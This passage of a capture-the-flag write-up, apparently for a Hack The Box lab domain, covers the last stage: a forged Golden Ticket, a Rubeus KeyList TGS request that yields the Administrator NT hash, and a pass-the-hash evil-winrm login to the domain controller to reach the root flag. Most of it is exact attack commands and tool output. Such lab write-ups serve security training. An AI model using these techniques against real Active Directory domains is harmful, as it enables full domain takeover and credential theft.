[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@garfield.htb'
[*] AuthTime : 4/11/2026 3:52:46 PM
[*] StartTime : 4/11/2026 3:52:46 PM
[*] EndTime : 4/12/2026 1:52:46 AM
[*] RenewTill : 4/18/2026 3:52:46 PM
[*] base64(ticket.kirbi):
doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB7iXrmkcsN7YRJctEtvDdjDZv1A0VNBibXG2e0was90d5bBqWk9BYSJ/gF1uHgFp96UKBY8tVWBhuJKbrjsLqYexZwOpoIqaalv0HxR/ULvg9p/x4ySRhfFnQ+CIjhTjHFNyKUlFpGG4L5Ay/Pmvt75c2dUfYakigfTo90alK1c6aNykbMRGOTy5/M3WWER3b8Sq2jowdPPkopAhP4znS88IyJNsxI1E/ys4uCGbcLUS+brgUEfpF0jTx4apS2LTcZl0sY8eeZYGfvmblULaFO4bnPOLAJHVJ0WiM2e3OGaqph2ZqzVVimDRvayUZfJbD84DlqiUtjqkgLwExy+dORQw/X+Cv1+2xWkJB7ZHb4PUaxGCvoNTtGm4BVM+uiNgUSzX/Mg3XwtheUyhbHhEKgA2W3ivK86qTA7/mhmEbcds+l/my7LFs32oaorayZEIXgxVljRGbiL9SN0gelMjv2sVxDN/90LERcA40smvjcq1gUGycgWa527A+4Hk84P8v18wGcbpQg79ukL4Voua6+eLHuMYFD5ywoZObMDOp5WZeuL3Lb2bLgFzr9w52G7Af6RIC71jnmhSi7BMuW5pyXzfkJBe5kK785SX7TeFeAjJjQ+lNDfk1yjeTpctGgbUwjaoxI4b5Lvd4TZtcT40OQK4Q0OurmL2ZTdkYsjpQomsJIQYR2NuwRPBwv04yQLCXDMzvZNJ3ju3QsRHJgcx6scZqfnDFtm8qzrWl+QENpuEbhgNwBdnPr0QNkIO4l7vctpimGECqxGQ7KeYIAEVHVWjZIGtwl/TUh/BAJmhr3+3Ose6l0C0nWgN6u5Vb7dmvjLpbYEU8fCHOVLZutDiz5VrdIFGXlkvMyW4kHNHNTL0XHQhn1AOllGlR63DExo6ze70SSWLJ7mCZQ2aPaK8bhKLjlpI2+f8Zye23zDa6vjSkK1vglzK/3Rys8qUPhykdeQxc1upzSw9I1jipFMigryOBI5ZKTdgJ4TZh9Q50ATYOQIlBROSbamhc9jwRgsS/6/Ve/+PPlEg4u3B8CZ4D488b+u70arpWuakvhBYjXLeX92KMaZEtkR9JKSI/laL0vXdPyh7FvhzLIjigOdIqD64t3AOxj7BNsUb6yq8+NbsosSwcazUbmohLUmxG4jf1krJW9xnQhmhFI2vekIm0v1Lau9dhhxkZ/mXOlOG38qokXKZPkj3pHtgaTbDUIXEb2Zve6A1TnMCuBKCcBw+QAP2nFQteIrQPZ2yHGJud1fBdiiDa4RSBR1n09PuBeaF0fz995PNx8V57U6S9VygGNuoS08b/jIrIN7TnZDdBfmOEUobP0p8Rl66BhK61bEDScVbYTIP+WRAmWYM5+mKmhzKIe75DA+NBJn/oGf2O+IkSKj+ZP2ZWtDBX/p3Z6po4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQgpoGUjIfYvaDg8B+1aYY1rdnjnLVypN7sZvrPI9JeHLGhDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTIyNTI0NlqlERgPMjAyNjA0MTEyMjUyNDZaphEYDzIwMjYwNDEyMDg1MjQ2WqcRGA8yMDI2MDQxODIyNTI0NlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=
[*] Ticket written to administrator_2026_04_11_22_52_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi10) Request TGS for DC & Authenticate as Administrator
Having constructed the Golden Ticket, I requested a Ticket Granting Service (TGS) ticket through Rubeus against DC01:
*Evil-WinRM* PS C:\Users\Administrator.GARFIELD\Documents> ./Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/Garfield.htb /dc:dc01.garfield.htb /ticket:doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB6wYzn83b93Yjf6RlQaOADVrbH6LHjXmVTG/7Xn+r6jIbG+8hEkPs0P5EgBebc73NyTStEdA6vgjgfG7P8JVMGuCD10lhFW140YUHQN+Ymc8iHOWTVhQHQqId3HQ8iaEv2tLr51WS3fiuqm8ACY1zSKaNkO5lawSxZZ57UF864xAqLZUZG3bzxKLmk97PGoGKrEgzoOZ82b+BAcivToQ0tLbW2Wv/xaDxCDQ503TzMjoS2CaGSJGLyG9i6nR+q4DUJL3g2ZvKKw/l7olJWveOv8RIilSKQW8L859B/5u4Q9u6F8VcYzB7V7kEZ/q2lQ1dG/ea4jjKSgjOx1ahfhNRvcZQ2VzGpvPSgfIcKspLZPSH0Zi94egFMrXB2/xAKIGmof8QEBOGE/cW3qTliTPuEXiPyZ0TGO0vDyYhmuXiDDDQtbGT0AR/jqL0JN2i+KLjir++DWg0WoEyTf0cH+90/j+Co20iv+ljMJwTAYjP8laJEbNPuketBRfAT783gRLPVEJQ1uFvgcK7jlKgNANwuY2s88JarD5HKdcaKSmqCA7Y5ZEB+hMvuP97mVEX5UeqAmCfHpdtqo6fPrchKMrL+Ombgr8/UUs+ndsq6ldnEJeEQrYw93of65C7cGVJxFbTjxj/xdRqX+HPCi7I1WNSYw3zxgiqSpqqumq88DzYCRzD7z/O9dH/1oyviH8FlCc/k908BQcwcRw7izDtOmF87KXMPACwijIQmTx4dqHznAuq5JAwV+yaJFhX+LRgNuoc7XNZJboXwg0tNqt2aJDYlGuZr6tt7AdrSytbF6bO+4KfI4KhdArE4RdgyqsL2/3Kht/K1IfZWaPithLD2vgK3fuiYOCJVe8CSvpdKhN22qmAmNNTvx3BJ3UHR+CFf9tmlcg5zwm9CijnMLPqWuHZZfWwdonPzAywCrU6mtga04n3zYCp44mCeOsuadl0SRyxxCJ2zh7VyW6J7D2s/Mt851dp738P6doClbZhrALe5D7cF8Ji3wKgvcd5kfEuSbn3SsUdv+bPq9i5UsX24NCfhOnwP3xNTkrJzk1bnnZKF0mD5MZRkAiXPl4ift1ry7yOtolKYGL7fK1Ro+4/2GX+JjWt0T/VGsyyh7T1GSq9jHFJu/e2oGTUFme7npEB6ia1oiQWmQgFTdi+z5IxgavgM/9Tug/KoJwo/0cZCD+sZVZttVJr43eKsiXfCOhNPOooekDkc/nfMG9wmY4HcFNUWi1Ic9C075YXbyazaumX7QJ2dfI8X4Hf/7IEa8c5R6Bm2GtR+E1a4hZVEF7dZ3VTLPlXWp8sllGf3A5S4zIVadP5ZxikCvJinCW2w9EbOvF4jSVLTdfBxROkuvwt0dGRAB2N23tfyKM9/ELloqcqXRuDltjmDfPrkFliA0K828o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQgbRkot+QXK+whtSqz/GKv4NXOp9PuFouuMVUAkgWhw2ahDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTIyMDYzMlqlERgPMjAyNjA0MTEyMjA2MzJaphEYDzIwMjYwNDEyMDgwNjMyWqcRGA8yMDI2MDQxODIyMDYzMlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting 'aes256_cts_hmac_sha1' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: dc01.garfield.htb (192.168.100.1)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFnjCCBZqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+g
AwIBAqEYMBYbBmtyYnRndBsMR0FSRklFTEQuSFRCo4IEaTCCBGWgAwIBEqEDAgECooIEVwSCBFP0icFY
EIh3LqzKDDTs8cd99HTPUcMtkulav8wxwgW8psJxy7ONONCr1LIqUsmWGKsLaMrA9Q7dEdVHmfEJ1YUQ
09pH1b1YzV5KTCK8KuC8ndhoaKJb62nzOmzK+TbVjUeAowMH7AtlP/c+MdOhIgv0ETTEnS6Y5r8YUHBs
+mYBGAuE0X3pYoBIFeB7hTHnSYj4eK9vFeR2gqGlS5hhGosEUeX0AhRSXz6codm8kggL7D5rZqYnqIqk
rha4xc0/QI/eo05REZ6YUJNrttaoz77ha6azx3c8N0KSebZtHEQS/luVR2YxkDT2CE/ldUlCOp6I7UTO
Lt52j8mSn0emoRu4IZ1Lm2FnVxh0vbeI/yYWIYOFR6dvURBLQMvcdyrbXCJjbBlpg3l6VGG60LM7K8LJ
ZpEtedom/gk8AOetypDqIMebs+FfqmEzO9jAbSA3zIEslPnpXsQCFg1Bqz74jdDuy1Y3ySw4iosD7QoL
yIdxhhb1Mgo6FW+kF0qBSXhhmm4TFHTkMZTijtTGb3KWjCUpA994qu+nZKVpcMnFnkZQZhM6Sm4aLpLo
p2WNRv/8xZQkm5s1wY8kb917iO2j2FRIYlYj+QlM404Db5OhVbo4p2gp3AI5XabDRmKk6J99Q6njMxuy
GJPPqVC/0Zx0WrCO2T6vvV7ZnacI2zGyrffS1Xsv2pMCZUp0S8NHY/GAa0Fs/2N8GP23q7SscGVPICT8
4rZ74FqU2fCGStiQ8OMqGJJwWFsI7rdr2hPuqqJL0e2sUr5TiufcMR2ubNiEiAw1/1n86HnfGK7nBLDc
l5BZ/ScxYvlJAf/oPmg/bVzHzK1ytNypNNUhlldkXa3VgNHELqNtOH7+1gDfLUgwKSt3fXzDwjgsSgfS
KMJKPkYC4kqdLMFw0o403fRhSMvXpMMYKc/IstzszP0vfwpvkNL+hLpo+ysMgT6ACKgMYgMqvTrskhxy
5r4L2/iuUnOBZlOjaooNq+7e73uF0Y39lovCdbNmzDm0+uUSOHfVl72vkpHVFUfSmjH+FpDYgd+3uGaS
uBriqRynCU/7RQJmQ6YAnNHCF+Arx/cSt+HK5QK9AD2sQsqCkRaAe2/Dd8GHr1GiFxu8SFZdC1kOAAlO
sDuHk+b4zLUDlCktMJ7cESBrTl0Q+f3zL+TjBOJ7xINlz1aN9FY/d9Ifieqz5Lu/rEVWM2BzxkhSR6zD
lA01BNQPdHtJFBz3G4nipp7rTryQ0Nw3rBfzVk3cfNGXF5gzMm71rajBj/f2S7/uCPuQyHE6qBos813n
/qAWl64Ks3OAaqa3gT40wiKKD1aYMuOFD4NvH1yRspQSQhRY7PceMVlSywpWgK7D49NiIy/WRVxyFDjx
yQdjy8HnX8CSzqRC8/vXdp3LWaQgP60mYokJogng3v2pwl1LNhy/vBlM6dKuxlPpUwGHL3Uf9LgRN1Wz
YSwn0PEy+zRJaRcUZrST0fxS5FzX9MqjgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmg
AwIBEqEiBCDqNECWceL/K/NCWGr3jgK5d3PYVp8BLt1RUf+ZaqRtraEOGwxHQVJGSUVMRC5IVEKiGjAY
oAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQAAAQAApREYDzIwMjYwNDExMjI1MzE2WqYRGA8yMDI2
MDQxMjA4MDYzMlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxHQVJGSUVMRC5I
VEI=
ServiceName : krbtgt/GARFIELD.HTB
ServiceRealm : GARFIELD.HTB
UserName : Administrator (NT_PRINCIPAL)
UserRealm : GARFIELD.HTB
StartTime : 4/11/2026 3:53:16 PM
EndTime : 4/12/2026 1:06:32 AM
RenewTill : 1/1/0001 12:00:00 AM
Flags : name_canonicalize
KeyType : aes256_cts_hmac_sha1
Base64(key) : 6jRAlnHi/yvzQlhq944CuXdz2FafAS7dUVH/mWqkba0=
Password Hash : EE238F6DEBC752010428F20875B092D511) Access DC01 and Grab Root Flag
With the extracted NT Hash for Administrator, I used evil-winrm to natively establish an administrative session into DC01 and retrieve the root flag:
┌──(global_venv)─(w_11㉿kali)-[~/…/htb/garfield/solution/realnewtest]
└─$ evil-winrm -i dc01.garfield.htb -u Administrator -H 'EE238F6DEBC752010428F20875B092D5'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/13/2026 5:16 PM Scripts
d----- 8/16/2025 4:26 PM VMs
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/11/2026 1:01 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>